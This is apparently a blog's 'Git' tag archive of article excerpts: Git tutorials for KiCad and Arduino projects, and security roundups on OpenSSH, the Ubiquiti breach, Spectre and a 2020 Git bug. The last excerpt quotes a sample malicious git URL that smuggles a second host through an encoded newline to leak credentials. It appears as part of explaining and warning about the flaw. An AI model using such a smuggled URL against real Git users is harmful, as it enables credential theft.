Git

35 Articles

Git Your PCBs Online

October 6, 2022 by 16 Comments

Last time, I’ve shown you how to create a local Git repository around your PCB project. That alone provides you with local backups, helping you never lose the changes you make to your files, and always be able to review the history of your project as it developed.

However, an even more significant part of Git’s usefulness is the ability to upload our creations to one of the various online Git repository hosting services, and keep it up to date at all times with a single shell command. I’d like to show you how to upload your project to GitHub and GitLab, in particular!

Continue reading “Git Your PCBs Online”

Git Intro For Hardware Hackers

September 12, 2022 by 20 Comments

Git is a wonderful tool that can multiply your project’s impact, or make your project easier to manage by an order of magnitude. Some of us hackers don’t yet know how to use command-line Git, but a relatable example of why a certain tool would be useful might be a good start. Today, I’d like to give you a Git crash course – showing you why and how to put a KiCad PCB into a Git repository, later to be shared with the world.

KiCad works wonderfully with Git. The schematic and PCB files of KiCad are human-readable, especially when compared to other PCB file formats. KiCad creates different files for different purposes, each of them with a well-defined role, and you can make sense of every file in your project folder. What’s more, you can even modify KiCad files in a text editor! This is exactly the kind of use case that Git fits like a glove.

Not Just For Software Developers

What’s Git about, then? Fundamentally, Git is a tool that helps you keep track of code changes in a project, and share these changes with each other. Intended for Linux kernel development as its first target, this is what it’s been designed for, but it’s flexibility extends far beyond software projects. We hardware hackers can make use of it in a variety of ways – we can store PCB and other design software files, blog articles, project documentation, personal notes, configuration files and whatever else that even vaguely fits the Git modus operandi. Continue reading “Git Intro For Hardware Hackers”

Arduino And Git: Two Views

April 29, 2022 by 16 Comments

You can’t do much development without running into Git, the version control management system. Part of that is because so much code lives on GitHub which uses Git, although you don’t need to know anything about that if all you want to do is download code. [Dr. Torq] has a good primer on using Git with the Arduino IDE, if you need to get your toes wet.

You might think if you develop by yourself you don’t need something like Git. However, using a version control system is a great convenience, especially if you use it correctly. There’s a bug out in the field? What version of the firmware? You can immediately get a copy of the source code at that point in time using Git. A feature is broken? It is very easy to see exactly what changed. So even if you don’t work in a team, there are advantages to having source code under control.

Continue reading “Arduino And Git: Two Views”

This Week In Security: OpenSSH, Git, And Sort-of NGINX 0-day

April 15, 2022 by 20 Comments

OpenSSH has minted their 9.0 release, and it includes a pair of security changes. Unlike most of the releases we cover here, this one has security hardening to prevent issues, not emergency fixes for current ones. First up, the venerable scp/rcp protocol has been removed. Your scp commands will now use SFTP under the hood. The more interesting security change is the new default key exchange, the NTRU algorithm. NTRU is thought to be quantum-hard.
Continue reading “This Week In Security: OpenSSH, Git, And Sort-of NGINX 0-day”

This Week In Security: Ubiquity Update, PHP Backdoor, And Netmask

April 2, 2021 by 11 Comments

Back in January, we covered the news that Ubiquiti had a breach of undisclosed severity. One reader pointed out the compromise of a handful of devices as potentially related. With no similar reports out there, I didn’t think too much of it at the time. Now, however, a whistleblower from Ubiquiti has given Krebs the juicy details.

The “third party cloud provider” the original disclosure referred to was Amazon Web Services (AWS). According to the whistleblower, just about everything was accessible, including the keys to log in to any Ubiquiti device on the internet, so long as it was cloud enabled. The attackers installed a couple of backdoors in Ubiquiti’s infrastructure, and sent a 50 bitcoin blackmail threat. To their credit, Ubiquiti ignored the blackmail and cleaned up the mess.

To the claim that there was no evidence attackers had accessed user accounts, it seems that the database in question simply has no logging enabled. There was no evidence, because nothing was watching. So far, I’ve only seen the one report of device compromise that was potentially a result of the attack. If you had a Ubiquiti device go rogue around December 2020 – January 2021, be sure to let us know. Continue reading “This Week In Security: Ubiquity Update, PHP Backdoor, And Netmask”

This Week In Security: Spectre In The Browser, Be Careful What You Clone, And Hackintosh

March 19, 2021 by 12 Comments

Google has been working on mitigations for the Spectre attack, and has made available a Proof of Concept that you can run in your browser right now. Spectre is one of the issues that kicked off the entire series of speculative execution vulnerabilities and fixes. What Google has demonstrated is that the Spectre attack can actually be pulled off in Javascript, right in the browser. Spectre is limited to reading memory allocated to the same process, and modern browsers have implemented measures like site isolation, which puts each site in a separate, sandboxed process.

These security features don’t mean that there is no practical dangers from Spectre. There are a handful of ways an attacker can run Javascript on another site, from something as simple as an interactive advertisement, to a cross-site scripting injection. Google has produced features and guidance to mitigate those dangers.

Via Bleeping Computer. Continue reading “This Week In Security: Spectre In The Browser, Be Careful What You Clone, And Hackintosh”

This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

April 17, 2020 by 8 Comments

Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.
Continue reading “This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation”